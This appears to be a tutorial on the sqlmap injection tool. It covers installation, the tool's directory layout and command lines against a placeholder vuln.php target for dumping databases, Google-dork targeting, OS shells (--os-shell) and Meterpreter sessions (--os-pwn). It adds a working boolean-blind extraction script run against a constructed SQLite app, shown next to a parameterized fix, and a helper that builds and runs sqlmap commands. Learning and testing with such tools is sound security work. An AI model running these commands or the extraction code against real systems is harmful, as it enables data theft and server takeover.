sqlmap

With sqlmap you can take over or dump entire databases, escalate privileges, handle anti-CSRF tokens (--csrf-token) and get a heuristic warning when a parameter also looks open to XSS. It is useful for parameter fuzzing and HTTP parameter pollution (--hpp) to bypass business logic, and it can process Google dorks (-g) to find candidate targets. It also does banner grabbing, crawling and DBMS fingerprinting. The release this write-up was based on required Python 2.7; current releases run on Python 2.6, 2.7 or 3.x. Download sqlmap from its official repository with the command below, or as a release archive from the project website.

git clone --depth 1 https://github.com/sqlmapproject/sqlmap.git sqlmap-dev

Below is the directory structure of sqlmap (the older layout; newer releases move shell/, txt/, udf/, waf/ and xml/ under data/).

doc/ —> The official user manual, a must-read before performing any operation.

extra/ —> Helper utilities used by the takeover features: the ICMP shell, shellcode, the cloak tool that obfuscates the bundled backdoors, runcmd and dbgtool.

lib/ —> Core libraries: the injection techniques, HTTP request handling and parsing, the takeover logic and the Metasploit integration.

plugins/ —> plugins/generic/ holds the DBMS-independent enumeration, file-system and takeover routines; the per-DBMS code lives in plugins/dbms/ (next entry).

plugins/dbms/ —> Connection, fingerprinting, user and database enumeration and takeover scripts for each supported DBMS (MySQL, Oracle, PostgreSQL, Firebird and others).

shell/ —> Web backdoors and stagers (ASP, ASPX, JSP, PHP), stored in cloaked form and decoded when --os-shell uploads them.

tamper/ —> Tamper scripts that transform payloads to evade input filters and web application firewalls (for example space2comment and randomcase). Users can write their own and load them with --tamper.

txt/ —> Built-in word lists: common table and column names, User-Agent strings and the password-cracking wordlist.

udf/ —> Precompiled user-defined function libraries (shared objects and DLLs) for MySQL and PostgreSQL on Windows and Linux, uploaded through the injection to run operating system commands.

waf/ —> Detection scripts for WAF and IPS/IDS products such as ModSecurity, Barracuda and Incapsula, used by the WAF identification check.

xml/ —> XML definitions: the payloads for each injection technique (boolean-based blind, error-based, union, stacked, time-based blind), payload boundaries, DBMS error signatures and the per-DBMS enumeration queries.

Generic operations with sqlmap

sqlmap -hh (lists every option with a description; -h shows only the basic ones)

sqlmap -u "http://www.site.com/vuln.php?id=1" (tests the GET parameter id of the vulnerable target)

sqlmap -u "http://www.site.com/vuln.php?id=1" --crawl=3 (crawls the site from the given URL down to depth 3 and tests what it finds)

sqlmap -u "http://www.site.com/vuln.php?id=1" -a (retrieves everything: banner, current user and database, privileges, databases, and so on)

sqlmap -u "http://www.site.com/vuln.php?id=1" --dbs (enumerates the DBMS databases)

sqlmap -u "http://www.site.com/vuln.php?id=1" -D [database name] --dump --random-agent --level=[1-5] --risk=[1-3] (dumps every table of a database found with the previous command, using a randomly chosen User-Agent; higher level and risk values add more test vectors and more aggressive payloads at the cost of time and noise)

sqlmap -u "http://www.site.com/vuln.php?id=1" -D [database name] -T [table name] -C [column name] --dump (dumps specific columns of a table)

sqlmap -u "http://www.site.com/vuln.php?id=1" --sqlmap-shell (opens the interactive sqlmap shell)
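The --dbs and --dump commands above all rest on one primitive: turning a single injectable parameter into a yes/no oracle and asking it about every character of the data. As an added example (my code, not sqlmap's and not from this page), the snippet below builds that oracle against a constructed in-memory SQLite "application" with a vuln.php-style handler that concatenates id into its query, and recovers a table list and a password by boolean-based blind injection, exactly the way sqlmap's boolean-based technique does. The hardened handler beside it binds the value as a parameter, and the same extraction routine gets nothing from it. The table and column names, the secret and the request counting are all constructed for the example.

```python
# Added example: boolean-based blind extraction against a constructed SQLite app.
# Not sqlmap code; everything below (schema, data, handlers) is made up for the demo.
import sqlite3


def build_db():
    """Constructed sample database: a catalogue table and a users table with a secret."""
    conn = sqlite3.connect(":memory:")
    cur = conn.cursor()
    cur.execute("CREATE TABLE products (id INTEGER PRIMARY KEY, name TEXT)")
    cur.execute("CREATE TABLE users (id INTEGER PRIMARY KEY, username TEXT, password TEXT)")
    cur.executemany("INSERT INTO products (id, name) VALUES (?, ?)",
                    [(1, "widget"), (2, "gadget")])
    cur.execute("INSERT INTO users VALUES (1, 'admin', 's3cret!')")
    conn.commit()
    return conn


def vuln_page(conn, id_param):
    """Vulnerable handler: id is concatenated into SQL, like vuln.php?id=1 in the text."""
    sql = "SELECT name FROM products WHERE id = " + id_param
    try:
        row = conn.execute(sql).fetchone()
    except sqlite3.Error:
        return "Error"
    return "Product: %s" % row[0] if row else "No such product"


def safe_page(conn, id_param):
    """Hardened handler: the value is validated and bound, so it cannot alter the query."""
    try:
        pid = int(id_param)
    except ValueError:
        return "Bad id"
    row = conn.execute("SELECT name FROM products WHERE id = ?", (pid,)).fetchone()
    return "Product: %s" % row[0] if row else "No such product"


def ask(page, conn, condition, truth):
    """Boolean oracle: True iff the page with `1 AND (condition)` matches the `id=1` page."""
    return page(conn, "1 AND (%s)" % condition) == truth


def extract(page, conn, expr, maxlen=32):
    """Recover the string value of the SQL expression `expr` character by character.

    Each character is found by binary search over its code point (0..127) using
    unicode(substr(...)), the same idea sqlmap's boolean-based technique uses.
    Returns (value, number_of_injected_requests).
    """
    truth = page(conn, "1")          # baseline "true" response, fetched once
    result, requests = "", 0
    for pos in range(1, maxlen + 1):
        requests += 1
        # Does a character exist at this position at all?
        if not ask(page, conn, "unicode(substr((%s),%d,1)) > 0" % (expr, pos), truth):
            break
        lo, hi = 0, 127
        while lo < hi:
            mid = (lo + hi) // 2
            requests += 1
            if ask(page, conn, "unicode(substr((%s),%d,1)) > %d" % (expr, pos, mid), truth):
                lo = mid + 1
            else:
                hi = mid
        result += chr(lo)
    return result, requests


TABLES = "SELECT group_concat(name) FROM (SELECT name FROM sqlite_master WHERE type='table' ORDER BY name)"
ADMIN_PW = "SELECT password FROM users WHERE username='admin'"

if __name__ == "__main__":
    db = build_db()
    print(extract(vuln_page, db, TABLES))    # what --tables would show
    print(extract(vuln_page, db, ADMIN_PW))  # what --dump would show
    print(extract(safe_page, db, ADMIN_PW))  # nothing: the oracle never fires
```

Seven characters cost 57 requests here (one existence check plus seven binary-search steps per character, plus the final check that ends the string), which is why blind dumps are slow and why sqlmap offers --threads and prefers error-based or UNION techniques when the target allows them.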

Advanced operations with sqlmap

sqlmap -u "http://www.site.com/vuln.php?id=1" --os-shell (if the injection allows it, uploads a web stager and backdoor, or a UDF library, through the database and prompts for an operating system shell)

sqlmap -u "http://www.site.com/vuln.php?id=1" --msf-path=[MSFPATH] --os-pwn (delivers a Metasploit payload through the injection and prompts for an out-of-band Meterpreter session; needs a local Metasploit Framework installation, pointed to with --msf-path)

sqlmap -r request.txt -p [parameter name] (loads a raw HTTP request saved from a proxy such as Burp and tests only the named parameter)
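The -r option above expects a raw HTTP request on disk, with sqlmap taking the target host from the Host header (add --force-ssl if it was captured over HTTPS). As an added example (my code, not sqlmap's and not from this page), the snippet below parses such a request, lists every GET, POST and Cookie parameter that -p could be pointed at, and builds the matching sqlmap command line. The request is constructed for the example, and sqlmap_argv/run_sqlmap are hypothetical helpers; the one real caveat they encode is that sqlmap only tests Cookie values from --level=2 upwards.

```python
# Added example: parse the raw request format that `sqlmap -r` reads and pick -p targets.
# Not sqlmap code; the request text below is constructed for the example.
import shutil
import subprocess
from urllib.parse import parse_qsl, urlsplit

# Constructed sample: what a request saved from an intercepting proxy looks like.
SAMPLE_REQUEST = """POST /vuln.php?id=1 HTTP/1.1
Host: www.site.com
Cookie: PHPSESSID=abc123; lang=en
Content-Type: application/x-www-form-urlencoded
Content-Length: 24

user=alice&search=widget
"""


def parse_request(raw):
    """Split a raw HTTP request into (method, target, headers, body)."""
    head, _, body = raw.replace("\r\n", "\n").partition("\n\n")
    lines = head.split("\n")
    method, target, _version = lines[0].split(" ", 2)
    headers = {}
    for line in lines[1:]:
        name, _, value = line.partition(":")
        headers[name.strip().lower()] = value.strip()
    return method, target, headers, body.strip()


def injectable_parameters(raw):
    """Return {parameter: place} for every GET, POST and Cookie parameter in the request."""
    _method, target, headers, body = parse_request(raw)
    params = {}
    for name, _ in parse_qsl(urlsplit(target).query, keep_blank_values=True):
        params[name] = "GET"
    if body and headers.get("content-type", "").startswith("application/x-www-form-urlencoded"):
        for name, _ in parse_qsl(body, keep_blank_values=True):
            params[name] = "POST"
    for part in headers.get("cookie", "").split(";"):
        name, _, _ = part.strip().partition("=")
        if name:
            params[name] = "Cookie"
    return params


def sqlmap_argv(request_file, parameter, place, extra=()):
    """Hypothetical helper: argv for `sqlmap -r <file> -p <parameter> --batch ...`.

    --batch answers sqlmap's prompts with defaults so the run is unattended.
    Cookie values are only tested at --level=2 or higher, so that is added for them.
    """
    argv = ["sqlmap", "-r", request_file, "-p", parameter, "--batch"]
    if place == "Cookie":
        argv.append("--level=2")
    return argv + list(extra)


def run_sqlmap(request_file, parameter, place, extra=()):
    """Hypothetical helper: run sqlmap when it is on PATH; return the argv either way."""
    argv = sqlmap_argv(request_file, parameter, place, extra)
    if shutil.which("sqlmap"):
        subprocess.run(argv, check=False)
    return argv


if __name__ == "__main__":
    with open("request.txt", "w") as fh:
        fh.write(SAMPLE_REQUEST)
    for name, place in injectable_parameters(SAMPLE_REQUEST).items():
        print(place, " ".join(sqlmap_argv("request.txt", name, place)))
```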
